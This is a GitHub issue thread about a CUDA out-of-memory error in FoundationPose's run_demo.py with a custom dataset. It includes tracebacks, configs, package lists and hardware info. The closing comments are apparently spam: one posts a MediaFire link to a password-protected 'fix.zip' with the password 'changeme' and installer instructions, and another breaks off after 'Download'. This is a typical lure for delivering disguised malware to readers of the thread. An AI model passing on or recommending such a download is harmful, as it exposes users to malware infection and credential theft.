### ISSUE TITLE
CUDA out of memory while running the `run_demo.py` with custom dataset (model-based)

### ISSUE THREAD

**Issue by mesilver1218** [NVlabs/FoundationPose#212]
Hi @wenbowen123 ,
Thanks for the great work.

I successfully set up the environment using Docker and was able to run the demo file about mustard0, without any issues. 
However, when I try to run the `run_demo.py` file with my custom dataset, I encounter problems.

I have thoroughly reviewed all the relevant posts in the GitHub issues section, but unfortunately, none of them have resolved my issue. Although I believe my input image is already quite small (640x480), I have also tried adjusting the `downscale` and `shorter_side` parameters of the YcbineaotReader, as suggested in previous posts. While these parameters do reduce the image size, even with settings like downscale=0.05 and shorter_side=None, I still encounter a CUDA out of memory error. 

I also wondered if the issue might be related to the number of images, so I reduced the dataset to 217 images by sampling 1 frame out of every 5 from an original set of 1083 images. Unfortunately, the execution still stops due to memory constraints.
As I see, the image size is the same as mustard0, and the number of images shouldn't be an issue either, so I can't understand why the GPU usage is so different. Could you please check if there might be an issue with the code's path settings or if there's something wrong with my custom dataset?

(I wrote this post following the format of Issue #83.)

### My custom dataset: 
[Gdrive Folder](https://drive.google.com/drive/folders/1DQSnoYRLWD1j2sWfzK0XdiP9nXop_-az?usp=sharing)

The `run_demo.py` file was modified for the novel object, 'LeverHandle' (a kind of doorhandle).

I achieved **rgb/depth images** and **cam_K.txt** using realsense d435i from [ObjectDatasetTools](https://github.com/F2Wang/ObjectDatasetTools) and got **mask images** using Segment-Anything model.
And I obtained the **CAD file (.stl)** for the 3D model through SolidWorks, and I used Blender to convert the (.stl) file to **(.obj)** file and generate the **material file (.mtl)** and the **texture map (.png)**.

_I've also considered that the issue with my custom dataset might be due to either not using BundleSDF or an incorrect directory path setting of the codes `run_demo.py`, `datareader.py` that I may have missed._

### I am getting the main error as:
```c++

``` Traceback (most recent call last):
  File "run_demo.py", line 52, in <module>
    pose = est.register(K=reader.K, rgb=color, depth=depth, ob_mask=mask, iteration=args.est_refine_iter)
  File "/workspace/estimater.py", line 215, in register
    poses, vis = self.refiner.predict(mesh=self.mesh, mesh_tensors=self.mesh_tensors, rgb=rgb, depth=depth, K=K, ob_in_cams=poses.data.cpu().numpy(), normal_map=normal_map, xyz_map=xyz_map, glctx=self.glctx, mesh_diameter=self.diameter, iteration=iteration, get_vis=self.debug>=2)
  File "/opt/conda/envs/my/lib/python3.8/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/workspace/learning/training/predict_pose_refine.py", line 184, in predict
    pose_data = make_crop_data_batch(self.cfg.input_resize, B_in_cams, mesh_centered, rgb_tensor, depth_tensor, K, crop_ratio=crop_ratio, normal_map=normal_map, xyz_map=xyz_map_tensor, cfg=self.cfg, glctx=glctx, mesh_tensors=mesh_tensors, dataset=self.dataset, mesh_diameter=mesh_diameter)
  File "/opt/conda/envs/my/lib/python3.8/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/workspace/learning/training/predict_pose_refine.py", line 49, in make_crop_data_batch
    rgb_r, depth_r, normal_r = nvdiffrast_render(K=K, H=H, W=W, ob_in_cams=poseA[b:b+bs], context='cuda', get_normal=cfg['use_normal'], glctx=glctx, mesh_tensors=mesh_tensors, output_size=cfg['input_resize'], bbox2d=bbox2d_ori[b:b+bs], use_light=True, extra=extra)
  File "/workspace/Utils.py", line 170, in nvdiffrast_render
    pos_clip = (mtx[:,None]@pos_homo[None,...,None])[...,0]
torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 13.35 GiB. GPU 0 has a total capacty of 15.49 GiB of which 11.81 GiB is free. Including non-PyTorch memory, this process has 0 bytes memory in use. Of the allocated memory 2.71 GiB is allocated by PyTorch, and 24.69 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting max_split_size_mb to avoid fragmentation.  See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF
``` 

I am using an NVIDIA RTX 4060 Ti and an Intel(R) Core(TM) i9-14900K (details about the hardware have been mentioned at the end)
Given below are the outputs for `run_demo.py` with the custom dataset, and the following commands: `conda info`, `conda list`, `g++ --version`, `nvcc --version`, `lscpu`, and `nvidia-smi`.

When monitoring GPU usage with the `watch -d -n 0.3 nvidia-smi` command, the usage for mustard0 peaks at 5000MiB. However, when running my custom dataset, the usage rapidly exceeds 12000MiB, hitting the maximum and causing the code to terminate abruptly.

### output for the command `python run_demo.py`:
```c++
kist@kist1:~/Documents/FoundationPose$ docker exec -it f11bd02930eb /bin/bash
(my) root@kist1:/# cd /workspace
(my) root@kist1:/workspace# python run_demo.py
Warp UserWarning: Python 3.9 or newer is recommended for running Warp, detected sys.version_info(major=3, minor=8, micro=19, releaselevel='final', serial=0)
Warp 1.3.1 initialized:
   CUDA Toolkit 12.5, Driver 12.4
   Devices:
     "cpu"      : "x86_64"
     "cuda:0"   : "NVIDIA GeForce RTX 4060 Ti" (15 GiB, sm_89, mempool enabled)
   Kernel cache:
     /root/.cache/warp/1.3.1
[__init__()] self.cfg: 
 lr: 0.0001
c_in: 6
zfar: 'Infinity'
debug: null
n_view: 1
run_id: 3wy8qqex
use_BN: true
exp_name: 2024-01-11-20-02-45
n_epochs: 62
save_dir: /home/bowenw/debug/2024-01-11-20-02-45/
use_mask: false
loss_type: pairwise_valid
optimizer: adam
batch_size: 64
crop_ratio: 1.1
enable_amp: true
use_normal: false
max_num_key: null
warmup_step: -1
input_resize:
- 160
- 160
max_step_val: 1000
vis_interval: 1000
weight_decay: 0
normalize_xyz: true
resume_run_id: null
clip_grad_norm: 'Infinity'
lr_epoch_decay: 500
render_backend: nvdiffrast
train_num_pair: 5
lr_decay_epochs:
- 50
n_epochs_warmup: 1
make_pair_online: false
gradient_max_norm: 'Infinity'
max_step_per_epoch: 10000
n_rendering_workers: 1
save_epoch_interval: 100
n_dataloader_workers: 100
split_objects_across_gpus: true
ckpt_dir: /workspace/learning/training/../../weights/2024-01-11-20-02-45/model_best.pth

[__init__()] self.h5_file:None
[__init__()] Using pretrained model from /workspace/learning/training/../../weights/2024-01-11-20-02-45/model_best.pth
[__init__()] init done
[__init__()] welcome
[__init__()] self.cfg: 
 lr: 0.0001
c_in: 6
zfar: .inf
debug: null
w_rot: 0.1
n_view: 1
run_id: null
use_BN: true
rot_rep: axis_angle
ckpt_dir: /workspace/learning/training/../../weights/2023-10-28-18-33-37/model_best.pth
exp_name: 2023-10-28-18-33-37
save_dir: /tmp/2023-10-28-18-33-37/
loss_type: l2
optimizer: adam
trans_rep: tracknet
batch_size: 64
crop_ratio: 1.2
use_normal: false
BN_momentum: 0.1
max_num_key: null
warmup_step: -1
input_resize:
- 160
- 160
max_step_val: 1000
normal_uint8: false
vis_interval: 1000
weight_decay: 0
n_max_objects: null
normalize_xyz: true
clip_grad_norm: 'Infinity'
rot_normalizer: 0.3490658503988659
trans_normalizer:
- 0.019999999552965164
- 0.019999999552965164
- 0.05000000074505806
max_step_per_epoch: 25000
val_epoch_interval: 10
n_dataloader_workers: 60
enable_amp: true
use_mask: false

[__init__()] self.h5_file:
[__init__()] Using pretrained model from /workspace/learning/training/../../weights/2023-10-28-18-33-37/model_best.pth
[__init__()] init done
[reset_object()] self.diameter:0.1627922905607019, vox_size:0.008139614528035095
[reset_object()] self.pts:torch.Size([238, 3])
[reset_object()] reset done
[make_rotation_grid()] cam_in_obs:(42, 4, 4)
[make_rotation_grid()] rot_grid:(252, 4, 4)
num original candidates = 252
num of pose after clustering: 252
[make_rotation_grid()] after cluster, rot_grid:(252, 4, 4)
[make_rotation_grid()] self.rot_grid: torch.Size([252, 4, 4])
[<module>()] estimator initialization done
[<module>()] i:0
[register()] Welcome
Module Utils 64702ec load on device 'cuda:0' took 0.18 ms  (cached)
[register()] poses:(252, 4, 4)
[register()] after viewpoint, add_errs min:-1.0
/opt/conda/envs/my/lib/python3.8/site-packages/torch/__init__.py:614: UserWarning: torch.set_default_tensor_type() is deprecated as of PyTorch 2.1, please use torch.set_default_dtype() and torch.set_default_device() as alternatives. (Triggered internally at ../torch/csrc/tensor/python_tensor.cpp:451.)
  _C._set_default_tensor_type(t)
[predict()] ob_in_cams:(252, 4, 4)
[predict()] self.cfg.use_normal:False
[predict()] trans_normalizer:[0.019999999552965164, 0.019999999552965164, 0.05000000074505806], rot_normalizer:0.3490658503988659
[predict()] making cropped data
[make_crop_data_batch()] Welcome make_crop_data_batch
[make_crop_data_batch()] make tf_to_crops done
Traceback (most recent call last):
  File "run_demo.py", line 52, in <module>
    pose = est.register(K=reader.K, rgb=color, depth=depth, ob_mask=mask, iteration=args.est_refine_iter)
  File "/workspace/estimater.py", line 215, in register
    poses, vis = self.refiner.predict(mesh=self.mesh, mesh_tensors=self.mesh_tensors, rgb=rgb, depth=depth, K=K, ob_in_cams=poses.data.cpu().numpy(), normal_map=normal_map, xyz_map=xyz_map, glctx=self.glctx, mesh_diameter=self.diameter, iteration=iteration, get_vis=self.debug>=2)
  File "/opt/conda/envs/my/lib/python3.8/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/workspace/learning/training/predict_pose_refine.py", line 184, in predict
    pose_data = make_crop_data_batch(self.cfg.input_resize, B_in_cams, mesh_centered, rgb_tensor, depth_tensor, K, crop_ratio=crop_ratio, normal_map=normal_map, xyz_map=xyz_map_tensor, cfg=self.cfg, glctx=glctx, mesh_tensors=mesh_tensors, dataset=self.dataset, mesh_diameter=mesh_diameter)
  File "/opt/conda/envs/my/lib/python3.8/site-packages/torch/utils/_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
  File "/workspace/learning/training/predict_pose_refine.py", line 49, in make_crop_data_batch
    rgb_r, depth_r, normal_r = nvdiffrast_render(K=K, H=H, W=W, ob_in_cams=poseA[b:b+bs], context='cuda', get_normal=cfg['use_normal'], glctx=glctx, mesh_tensors=mesh_tensors, output_size=cfg['input_resize'], bbox2d=bbox2d_ori[b:b+bs], use_light=True, extra=extra)
  File "/workspace/Utils.py", line 170, in nvdiffrast_render
    pos_clip = (mtx[:,None]@pos_homo[None,...,None])[...,0]
torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 13.35 GiB. GPU 0 has a total capacty of 15.49 GiB of which 11.81 GiB is free. Including non-PyTorch memory, this process has 0 bytes memory in use. Of the allocated memory 2.71 GiB is allocated by PyTorch, and 24.69 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting max_split_size_mb to avoid fragmentation.  See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF
``` 

### output for the command `conda info`:
```c++
(my) root@kist1:/workspace# conda info

     active environment : my
    active env location : /opt/conda/envs/my
            shell level : 2
       user config file : /root/.condarc
 populated config files : 
          conda version : 24.7.1
    conda-build version : not installed
         python version : 3.12.4.final.0
                 solver : libmamba (default)
       virtual packages : __archspec=1=skylake
                          __conda=24.7.1=0
                          __cuda=12.4=0
                          __glibc=2.31=0
                          __linux=5.15.0=0
                          __unix=0=0
       base environment : /opt/conda  (writable)
      conda av data dir : /opt/conda/etc/conda
  conda av metadata url : None
           channel URLs : https://repo.anaconda.com/pkgs/main/linux-64
                          https://repo.anaconda.com/pkgs/main/noarch
                          https://repo.anaconda.com/pkgs/r/linux-64
                          https://repo.anaconda.com/pkgs/r/noarch
          package cache : /opt/conda/pkgs
                          /root/.conda/pkgs
       envs directories : /opt/conda/envs
                          /root/.conda/envs
               platform : linux-64
             user-agent : conda/24.7.1 requests/2.32.3 CPython/3.12.4 Linux/5.15.0-119-generic ubuntu/20.04.6 glibc/2.31 solver/libmamba conda-libmamba-solver/24.7.0 libmambapy/1.5.8 aau/0.4.4 c/. s/. e/.
                UID:GID : 0:0
             netrc file : None
           offline mode : False
``` 

### output for the command `conda list`:
```c++
(my) root@kist1:/workspace# conda list
# packages in environment at /opt/conda/envs/my:
#
# Name                    Version                   Build  Channel
_libgcc_mutex             0.1                        main  
_openmp_mutex             5.1                       1_gnu  
addict                    2.4.0                    pypi_0    pypi
aiohappyeyeballs          2.4.0                    pypi_0    pypi
aiohttp                   3.10.5                   pypi_0    pypi
aiosignal                 1.3.1                    pypi_0    pypi
albucore                  0.0.13                   pypi_0    pypi
albumentations            1.4.14                   pypi_0    pypi
annotated-types           0.7.0                    pypi_0    pypi
antlr4-python3-runtime    4.9.3                    pypi_0    pypi
anyio                     4.4.0                    pypi_0    pypi
argon2-cffi               23.1.0                   pypi_0    pypi
argon2-cffi-bindings      21.2.0                   pypi_0    pypi
arrow                     1.3.0                    pypi_0    pypi
asttokens                 2.4.1                    pypi_0    pypi
async-lru                 2.0.4                    pypi_0    pypi
async-timeout             4.0.3                    pypi_0    pypi
attrs                     24.2.0                   pypi_0    pypi
babel                     2.16.0                   pypi_0    pypi
backcall                  0.2.0                    pypi_0    pypi
beautifulsoup4            4.12.3                   pypi_0    pypi
blas                      1.0                         mkl    anaconda
bleach                    6.1.0                    pypi_0    pypi
blinker                   1.8.2                    pypi_0    pypi
braceexpand               0.1.7                    pypi_0    pypi
brotli                    1.1.0                    pypi_0    pypi
c-ares                    1.19.1               h5eee18b_0    anaconda
ca-certificates           2024.7.2             h06a4308_0  
certifi                   2022.12.7                pypi_0    pypi
cffi                      1.17.0                   pypi_0    pypi
charset-normalizer        2.1.1                    pypi_0    pypi
click                     8.1.7                    pypi_0    pypi
comm                      0.2.2                    pypi_0    pypi
configargparse            1.7                      pypi_0    pypi
contourpy                 1.1.1                    pypi_0    pypi
cycler                    0.12.1                   pypi_0    pypi
dash                      2.17.1                   pypi_0    pypi
dash-core-components      2.0.0                    pypi_0    pypi
dash-html-components      2.0.0                    pypi_0    pypi
dash-table                5.0.0                    pypi_0    pypi
dataclasses-json          0.6.7                    pypi_0    pypi
debugpy                   1.8.5                    pypi_0    pypi
decorator                 5.1.1                    pypi_0    pypi
defusedxml                0.7.1                    pypi_0    pypi
deprecated                1.2.14                   pypi_0    pypi
docker-pycreds            0.4.0                    pypi_0    pypi
einops                    0.8.0                    pypi_0    pypi
entrypoints               0.4                      pypi_0    pypi
et-xmlfile                1.1.0                    pypi_0    pypi
eval-type-backport        0.2.0                    pypi_0    pypi
exceptiongroup            1.2.2                    pypi_0    pypi
executing                 2.0.1                    pypi_0    pypi
fastjsonschema            2.20.0                   pypi_0    pypi
ffmpeg-python             0.2.0                    pypi_0    pypi
filelock                  3.13.1                   pypi_0    pypi
flask                     3.0.3                    pypi_0    pypi
fonttools                 4.53.1                   pypi_0    pypi
fqdn                      1.5.1                    pypi_0    pypi
freetype-py               2.4.0                    pypi_0    pypi
frozenlist                1.4.1                    pypi_0    pypi
fsspec                    2024.2.0                 pypi_0    pypi
future                    1.0.0                    pypi_0    pypi
fvcore                    0.1.5.post20221221          pypi_0    pypi
g4f                       0.3.2.4                  pypi_0    pypi
gitdb                     4.0.11                   pypi_0    pypi
gitpython                 3.1.43                   pypi_0    pypi
gputil                    1.4.0                    pypi_0    pypi
h11                       0.14.0                   pypi_0    pypi
h5py                      3.11.0           py38hbe37b52_0    anaconda
hdf5                      1.12.1               h2b7332f_3    anaconda
httpcore                  1.0.5                    pypi_0    pypi
httpx                     0.27.0                   pypi_0    pypi
huggingface-hub           0.24.6                   pypi_0    pypi
idna                      3.4                      pypi_0    pypi
imageio                   2.35.1                   pypi_0    pypi
imgaug                    0.4.0                    pypi_0    pypi
importlib-metadata        8.4.0                    pypi_0    pypi
importlib-resources       6.4.4                    pypi_0    pypi
intel-openmp              2023.1.0         hdb19cb5_46306    anaconda
iopath                    0.1.10                   pypi_0    pypi
ipycanvas                 0.13.2                   pypi_0    pypi
ipyevents                 2.0.2                    pypi_0    pypi
ipykernel                 6.29.5                   pypi_0    pypi
ipython                   8.12.3                   pypi_0    pypi
ipywidgets                8.1.5                    pypi_0    pypi
isoduration               20.11.0                  pypi_0    pypi
itsdangerous              2.2.0                    pypi_0    pypi
jedi                      0.19.1                   pypi_0    pypi
jinja2                    3.1.3                    pypi_0    pypi
joblib                    1.4.2                    pypi_0    pypi
json5                     0.9.25                   pypi_0    pypi
jsonpointer               3.0.0                    pypi_0    pypi
jsonschema                4.23.0                   pypi_0    pypi
jsonschema-specifications 2023.12.1                pypi_0    pypi
jupyter-client            7.4.9                    pypi_0    pypi
jupyter-core              5.7.2                    pypi_0    pypi
jupyter-events            0.10.0                   pypi_0    pypi
jupyter-lsp               2.2.5                    pypi_0    pypi
jupyter-server            2.14.2                   pypi_0    pypi
jupyter-server-terminals  0.5.3                    pypi_0    pypi
jupyterlab                4.2.4                    pypi_0    pypi
jupyterlab-pygments       0.3.0                    pypi_0    pypi
jupyterlab-server         2.27.3                   pypi_0    pypi
jupyterlab-widgets        3.0.13                   pypi_0    pypi
kaolin                    0.16.0                    dev_0    <develop>
kiwisolver                1.4.5                    pypi_0    pypi
kornia                    0.7.3                    pypi_0    pypi
kornia-rs                 0.1.5                    pypi_0    pypi
krb5                      1.20.1               h143b758_1    anaconda
lazy-loader               0.4                      pypi_0    pypi
ld_impl_linux-64          2.38                 h1181459_1  
libcurl                   7.88.1               h251f7ec_2    anaconda
libedit                   3.1.20230828         h5eee18b_0    anaconda
libev                     4.33                 h7f8727e_1    anaconda
libffi                    3.4.4                h6a678d5_1  
libgcc-ng                 11.2.0               h1234567_1  
libgfortran-ng            11.2.0               h00389a5_1    anaconda
libgfortran5              11.2.0               h1234567_1    anaconda
libgomp                   11.2.0               h1234567_1  
libnghttp2                1.57.0               h2d74bed_0    anaconda
libssh2                   1.11.0               h251f7ec_0    anaconda
libstdcxx-ng              11.2.0               h1234567_1  
llvmlite                  0.41.1                   pypi_0    pypi
loguru                    0.7.2                    pypi_0    pypi
markupsafe                2.1.5                    pypi_0    pypi
marshmallow               3.22.0                   pypi_0    pypi
matplotlib                3.7.5                    pypi_0    pypi
matplotlib-inline         0.1.7                    pypi_0    pypi
meshcat                   0.3.2                    pypi_0    pypi
mistune                   3.0.2                    pypi_0    pypi
mkl                       2023.1.0         h213fc3f_46344    anaconda
mkl-service               2.4.0            py38h5eee18b_1    anaconda
mkl_fft                   1.3.8            py38h5eee18b_0    anaconda
mkl_random                1.2.4            py38hdb19cb5_0    anaconda
mpmath                    1.3.0                    pypi_0    pypi
multidict                 6.0.5                    pypi_0    pypi
mypy-extensions           1.0.0                    pypi_0    pypi
nbclient                  0.10.0                   pypi_0    pypi
nbconvert                 7.16.4                   pypi_0    pypi
nbformat                  5.10.4                   pypi_0    pypi
ncurses                   6.4                  h6a678d5_0  
nest-asyncio              1.6.0                    pypi_0    pypi
networkx                  3.0                      pypi_0    pypi
ninja                     1.11.1.1                 pypi_0    pypi
nodejs                    0.1.1                    pypi_0    pypi
notebook-shim             0.2.4                    pypi_0    pypi
numba                     0.58.1                   pypi_0    pypi
numpy                     1.24.4                   pypi_0    pypi
nvdiffrast                0.3.1                    pypi_0    pypi
objaverse                 0.1.7                    pypi_0    pypi
omegaconf                 2.3.0                    pypi_0    pypi
open3d                    0.18.0                   pypi_0    pypi
opencv-contrib-python     4.10.0.84                pypi_0    pypi
opencv-python             4.10.0.84                pypi_0    pypi
openpyxl                  3.1.5                    pypi_0    pypi
openssl                   3.0.14               h5eee18b_0  
optional-django           0.1.0                    pypi_0    pypi
overrides                 7.7.0                    pypi_0    pypi
packaging                 24.1                     pypi_0    pypi
pandas                    2.0.3                    pypi_0    pypi
pandocfilters             1.5.1                    pypi_0    pypi
parso                     0.8.4                    pypi_0    pypi
pexpect                   4.9.0                    pypi_0    pypi
pickleshare               0.7.5                    pypi_0    pypi
pillow                    10.2.0                   pypi_0    pypi
pip                       24.2             py38h06a4308_0  
pkgutil-resolve-name      1.3.10                   pypi_0    pypi
platformdirs              4.2.2                    pypi_0    pypi
plotly                    5.23.0                   pypi_0    pypi
portalocker               2.10.1                   pypi_0    pypi
prometheus-client         0.20.0                   pypi_0    pypi
prompt-toolkit            3.0.47                   pypi_0    pypi
protobuf                  5.27.3                   pypi_0    pypi
psutil                    6.0.0                    pypi_0    pypi
ptyprocess                0.7.0                    pypi_0    pypi
pure-eval                 0.2.3                    pypi_0    pypi
pyarrow                   17.0.0                   pypi_0    pypi
pybind11                  2.14.0.dev1              pypi_0    pypi
pycocotools               2.0.7                    pypi_0    pypi
pycparser                 2.22                     pypi_0    pypi
pycryptodome              3.20.0                   pypi_0    pypi
pydantic                  2.8.2                    pypi_0    pypi
pydantic-core             2.20.1                   pypi_0    pypi
pyglet                    2.0.17                   pypi_0    pypi
pygments                  2.18.0                   pypi_0    pypi
pyngrok                   7.2.0                    pypi_0    pypi
pyopengl                  3.1.0                    pypi_0    pypi
pyparsing                 3.1.2                    pypi_0    pypi
pypng                     0.20220715.0             pypi_0    pypi
pyquaternion              0.9.9                    pypi_0    pypi
pyrender                  0.1.45                   pypi_0    pypi
python                    3.8.19               h955ad1f_0  
python-dateutil           2.9.0.post0              pypi_0    pypi
python-json-logger        2.0.7                    pypi_0    pypi
pytorch3d                 0.7.7                    pypi_0    pypi
pytz                      2024.1                   pypi_0    pypi
pywavelets                1.4.1                    pypi_0    pypi
pyyaml                    6.0.2                    pypi_0    pypi
pyzmq                     26.2.0                   pypi_0    pypi
readline                  8.2                  h5eee18b_0  
referencing               0.35.1                   pypi_0    pypi
requests                  2.32.3                   pypi_0    pypi
retrying                  1.3.4                    pypi_0    pypi
rfc3339-validator         0.1.4                    pypi_0    pypi
rfc3986-validator         0.1.1                    pypi_0    pypi
roma                      1.5.0                    pypi_0    pypi
rpds-py                   0.20.0                   pypi_0    pypi
rtree                     1.3.0                    pypi_0    pypi
ruamel-yaml               0.18.6                   pypi_0    pypi
ruamel-yaml-clib          0.2.8                    pypi_0    pypi
safetensors               0.4.4                    pypi_0    pypi
scikit-image              0.21.0                   pypi_0    pypi
scikit-learn              1.3.2                    pypi_0    pypi
scipy                     1.10.1                   pypi_0    pypi
seaborn                   0.13.2                   pypi_0    pypi
send2trash                1.8.3                    pypi_0    pypi
sentry-sdk                2.13.0                   pypi_0    pypi
setproctitle              1.3.3                    pypi_0    pypi
setuptools                72.1.0           py38h06a4308_0  
shapely                   2.0.6                    pypi_0    pypi
six                       1.16.0                   pypi_0    pypi
smmap                     5.0.1                    pypi_0    pypi
sniffio                   1.3.1                    pypi_0    pypi
soupsieve                 2.6                      pypi_0    pypi
sqlite                    3.45.3               h5eee18b_0  
stack-data                0.6.3                    pypi_0    pypi
sympy                     1.12                     pypi_0    pypi
tabulate                  0.9.0                    pypi_0    pypi
tbb                       2021.8.0             hdb19cb5_0    anaconda
tenacity                  9.0.0                    pypi_0    pypi
termcolor                 2.4.0                    pypi_0    pypi
terminado                 0.18.1                   pypi_0    pypi
threadpoolctl             3.5.0                    pypi_0    pypi
tifffile                  2023.7.10                pypi_0    pypi
timm                      1.0.8                    pypi_0    pypi
tinycss2                  1.3.0                    pypi_0    pypi
tk                        8.6.14               h39e8969_0  
torch                     2.1.0+cu121              pypi_0    pypi
torchaudio                2.1.0+cu121              pypi_0    pypi
torchvision               0.16.0+cu121             pypi_0    pypi
tornado                   6.4.1                    pypi_0    pypi
tqdm                      4.66.5                   pypi_0    pypi
traitlets                 5.14.3                   pypi_0    pypi
transformations           2022.9.26                pypi_0    pypi
trimesh                   4.4.7                    pypi_0    pypi
triton                    2.1.0                    pypi_0    pypi
types-python-dateutil     2.9.0.20240821           pypi_0    pypi
typing-extensions         4.9.0                    pypi_0    pypi
typing-inspect            0.9.0                    pypi_0    pypi
tzdata                    2024.1                   pypi_0    pypi
u-msgpack-python          2.8.0                    pypi_0    pypi
ultralytics               8.0.120                  pypi_0    pypi
uri-template              1.3.0                    pypi_0    pypi
urllib3                   1.26.13                  pypi_0    pypi
usd-core                  24.8                     pypi_0    pypi
videoio                   0.2.8                    pypi_0    pypi
wandb                     0.17.7                   pypi_0    pypi
warp-lang                 1.3.1                    pypi_0    pypi
wcwidth                   0.2.13                   pypi_0    pypi
webcolors                 24.8.0                   pypi_0    pypi
webdataset                0.2.96                   pypi_0    pypi
webencodings              0.5.1                    pypi_0    pypi
websocket-client          1.8.0                    pypi_0    pypi
werkzeug                  3.0.4                    pypi_0    pypi
wheel                     0.43.0           py38h06a4308_0  
widgetsnbextension        4.0.13                   pypi_0    pypi
wrapt                     1.16.0                   pypi_0    pypi
xatlas                    0.0.9                    pypi_0    pypi
xlsxwriter                3.2.0                    pypi_0    pypi
xz                        5.4.6                h5eee18b_1  
yacs                      0.1.8                    pypi_0    pypi
yarl                      1.9.4                    pypi_0    pypi
zipp                      3.20.0                   pypi_0    pypi
zlib                      1.2.13               h5eee18b_1
``` 

### output for the command `g++ --version`:
```c++
(my) root@kist1:/workspace# g++ --version
g++ (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
Copyright (C) 2019 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
``` 

### output for the command `nvcc --version`:
```c++
(my) root@kist1:/workspace# nvcc -V
nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2023 NVIDIA Corporation
Built on Mon_Apr__3_17:16:06_PDT_2023
Cuda compilation tools, release 12.1, V12.1.105
Build cuda_12.1.r12.1/compiler.32688072_0
``` 

### Information about the CPU
```c++
kist@kist1:~/Documents/FoundationPose$ lscpu
Architecture:                         x86_64
CPU op-mode(s):                       32-bit, 64-bit
Byte Order:                           Little Endian
Address sizes:                        46 bits physical, 48 bits virtual
CPU(s):                               32
On-line CPU(s) list:                  0-31
Thread(s) per core:                   1
Core(s) per socket:                   24
Socket(s):                            1
NUMA node(s):                         1
Vendor ID:                            GenuineIntel
CPU family:                           6
Model:                                183
Model name:                           Intel(R) Core(TM) i9-14900K
Stepping:                             1
CPU MHz:                              3200.000
CPU max MHz:                          6000.0000
CPU min MHz:                          800.0000
BogoMIPS:                             6374.40
Virtualization:                       VT-x
L1d cache:                            576 KiB
L1i cache:                            384 KiB
L2 cache:                             24 MiB
NUMA node0 CPU(s):                    0-31
Vulnerability Gather data sampling:   Not affected
Vulnerability Itlb multihit:          Not affected
Vulnerability L1tf:                   Not affected
Vulnerability Mds:                    Not affected
Vulnerability Meltdown:               Not affected
Vulnerability Mmio stale data:        Not affected
Vulnerability Reg file data sampling: Mitigation; Clear Register File
Vulnerability Retbleed:               Not affected
Vulnerability Spec rstack overflow:   Not affected
Vulnerability Spec store bypass:      Mitigation; Speculative Store Bypass disab
                                      led via prctl and seccomp
Vulnerability Spectre v1:             Mitigation; usercopy/swapgs barriers and _
                                      _user pointer sanitization
Vulnerability Spectre v2:             Mitigation; Enhanced / Automatic IBRS; IBP
                                      B conditional; RSB filling; PBRSB-eIBRS SW
                                       sequence; BHI BHI_DIS_S
Vulnerability Srbds:                  Not affected
Vulnerability Tsx async abort:        Not affected
Flags:                                fpu vme de pse tsc msr pae mce cx8 apic se
                                      p mtrr pge mca cmov pat pse36 clflush dts 
                                      acpi mmx fxsr sse sse2 ss ht tm pbe syscal
                                      l nx pdpe1gb rdtscp lm constant_tsc art ar
                                      ch_perfmon pebs bts rep_good nopl xtopolog
                                      y nonstop_tsc cpuid aperfmperf tsc_known_f
                                      req pni pclmulqdq dtes64 monitor ds_cpl vm
                                      x smx est tm2 ssse3 sdbg fma cx16 xtpr pdc
                                      m sse4_1 sse4_2 x2apic movbe popcnt tsc_de
                                      adline_timer aes xsave avx f16c rdrand lah
                                      f_lm abm 3dnowprefetch cpuid_fault epb ssb
                                      d ibrs ibpb stibp ibrs_enhanced tpr_shadow
                                       vnmi flexpriority ept vpid ept_ad fsgsbas
                                      e tsc_adjust bmi1 avx2 smep bmi2 erms invp
                                      cid rdseed adx smap clflushopt clwb intel_
                                      pt sha_ni xsaveopt xsavec xgetbv1 xsaves s
                                      plit_lock_detect avx_vnni dtherm ida arat 
                                      pln pts hwp hwp_notify hwp_act_window hwp_
                                      epp hwp_pkg_req umip pku ospke waitpkg gfn
                                      i vaes vpclmulqdq tme rdpid movdiri movdir
                                      64b fsrm md_clear serialize pconfig arch_l
                                      br flush_l1d arch_capabilities
``` 

### Information about the GPU
```c++
kist@kist1:~/Documents/FoundationPose$ nvidia-smi
Mon Aug 26 17:48:05 2024       
+-----------------------------------------------------------------------------------------+
| NVIDIA-SMI 550.107.02             Driver Version: 550.107.02     CUDA Version: 12.4     |
|-----------------------------------------+------------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id          Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |           Memory-Usage | GPU-Util  Compute M. |
|                                         |                        |               MIG M. |
|=========================================+========================+======================|
|   0  NVIDIA GeForce RTX 4060 Ti     Off |   00000000:01:00.0  On |                  N/A |
|  0%   45C    P3             22W /  165W |     929MiB /  16380MiB |      1%      Default |
|                                         |                        |                  N/A |
+-----------------------------------------+------------------------+----------------------+
                                                                                         
+-----------------------------------------------------------------------------------------+
| Processes:                                                                              |
|  GPU   GI   CI        PID   Type   Process name                              GPU Memory |
|        ID   ID                                                               Usage      |
|=========================================================================================|
|    0   N/A  N/A      1460      G   /usr/lib/xorg/Xorg                             71MiB |
|    0   N/A  N/A      2056      G   /usr/lib/xorg/Xorg                            403MiB |
|    0   N/A  N/A      2185      G   /usr/bin/gnome-shell                          111MiB |
|    0   N/A  N/A      2580      G   ...seed-version=20240822-180156.782000        228MiB |
|    0   N/A  N/A      5513      G   ...erProcess --variations-seed-version         72MiB |
+-----------------------------------------------------------------------------------------+
``` 

I would really appreciate any assistance you can provide. Thank you very much in advance!

Best Regards,
mesilver1218

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
